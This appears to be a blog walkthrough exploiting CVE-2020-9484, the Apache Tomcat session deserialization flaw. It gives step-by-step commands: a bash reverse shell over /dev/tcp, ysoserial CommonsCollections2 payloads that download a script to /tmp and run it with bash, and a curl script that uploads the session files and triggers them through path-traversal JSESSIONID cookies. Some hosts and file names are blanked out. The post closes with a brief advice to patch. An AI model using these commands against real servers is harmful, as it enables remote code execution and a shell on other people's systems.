
Apache Tomcat Server - Deserialization of Untrusted Data RCE

Tomcat remote code execution - deserialization of untrusted data



· 2 Min


Apache Tomcat is a widely-used open-source implementation of Java technologies, including Java Servlet, JavaServer Pages (JSP), Java Expression Language, and WebSocket. In this post, we'll delve into a critical vulnerability found in Apache Tomcat version 9.0.27, identified as CVE-2020-9484, which allows remote attackers to execute arbitrary code on a target system.

CVE-2020-9484: A Quick Overview

The vulnerability stems from insecure input validation when processing serialized data in uploaded file names. This flaw can be exploited by a remote attacker to execute arbitrary code by crafting a specially formatted file name. By exploiting this vulnerability, attackers can gain control over the target system.

Prerequisites for Exploitation

To exploit this vulnerability, the following conditions must be met:

  • The attacker must have the ability to upload a file with arbitrary content.
  • The location where the file is uploaded must be known.
  • The PersistentManager must be enabled and configured to use a FileStore.


Step 1: Session Management in Tomcat

Tomcat provides two primary implementations for session management:

  • StandardManager
  • PersistentManager

When PersistentManager is used, Tomcat first checks if the session exists in memory. If not, it looks for the session on the disk. When an HTTP request with a JSESSIONID cookie is received, Tomcat instructs the Manager to verify if the session exists. Due to the attacker's ability to manipulate the JSESSIONID, an attacker could send a value like JSESSIONID=../../../../../../tmp/12345, tricking Tomcat into checking for a session file in an arbitrary directory.

Step 2: How the Attack Works

  • Session Lookup: Tomcat checks the session file on disk if it is not found in memory. For example, it evaluates the session file location as ./session/../../../../../../tmp/12345.session.
  • Deserialization: If the file exists, Tomcat deserializes it, potentially executing the attacker's payload.

Step 3: Identifying the Vulnerable Server

First, you need to determine the server's file upload path. In this scenario, the path is /opt/sample/uploads, identified through a server exception message in the application.

File upload Path

Step 4: Create a Reverse Shell Payload

Next, create a reverse shell payload using a simple bash script:

#! /bin/bash
bash -c "bash -i >& /dev/tcp/ 0>&1"

Step 5: Create Serialized Session Files

To deliver and execute the payload, we’ll create two serialized session files using the ysoserial tool. You can download ysoserial from here.

  • File 1: Download Payload
    java -jar ysoserial-master-4df2ee2bb5-1.jar CommonsCollections2 'curl -o /tmp/' > downloadPayload.session
  • File 2: Execute Payload
    java -jar ysoserial-master-4df2ee2bb5-1.jar CommonsCollections2 'bash /tmp/' > executePayload.session

These two files will act as our malicious session payloads.

Payload Files

Step 6: Craft the Exploit Script

Create a simple bash script that sends the payload using curl and the crafted session files:

#! /bin/bash
curl -H 'Cookie:JSESSIONID=../../../opt/sample/uploads/downloadPayload' -F '[email protected]'
sleep 1
curl -H 'Cookie:JSESSIONID=../../../opt/sample/uploads/executePayload' -F '[email protected]'

In this script, is the address of our Tomcat server, and ../../../opt/sample/uploads/ is the file upload path.

Step 7: Execute the Exploit

Finally, set up a listener for the reverse shell and a web server to host the payload. Then, execute the bash script created in Step 4.

If successful, the Tomcat server will execute the malicious session files, leading to a reverse shell as the tomcat user.

Execute Payload

If successful, the Tomcat server will execute the malicious session files, leading to a reverse shell as the tomcat user. 😎


This post demonstrates the exploitation of a critical vulnerability in Apache Tomcat, CVE-2020-9484. By manipulating session IDs and exploiting deserialization flaws, attackers can execute arbitrary code on vulnerable servers. As always, it’s crucial to keep your software up to date and ensure proper validation and sanitization of user inputs.